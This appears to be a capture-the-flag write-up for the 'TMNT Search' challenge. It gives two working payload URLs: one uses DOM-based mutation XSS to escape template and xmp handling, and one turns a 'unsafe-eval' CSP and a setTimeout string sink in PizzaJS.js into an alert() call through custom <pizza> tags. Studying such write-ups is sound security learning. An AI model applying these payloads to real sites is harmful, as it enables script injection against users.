# TMNT Search

Bypass `document.createElement('template')` and `<xmp>` using a DOM based Mutant XSS.

```
https://tmnt.aperictf.fr/?s=<x/x='</xmp><s>Raphael'>
```

But you can't directly execute Javascript because of the CSP : `default-src 'self'; object-src 'none'; script-src 'self' 'unsafe-eval'`

Since `unsafe-eval` is present if you find an `eval()` like function, and call it with arbitrary parameters, you can bypass the CSP.

In `PizzaJS.js` there is `setTimeout('user.eated_pizza = 0; console.log("' + user.name + ' digested everything!")', 3000);`.
Using the custom html tag `<pizza>`, you can pass all the checks and call `setTimeout()`, to execute `alert()`.

```
http://tmnt.aperictf.fr/?s=<x/x='</xmp><pizza/user="-alert`Raphael`-"><pizza/cook/nb=1337><pizza/eat/nb=1337>'>
```
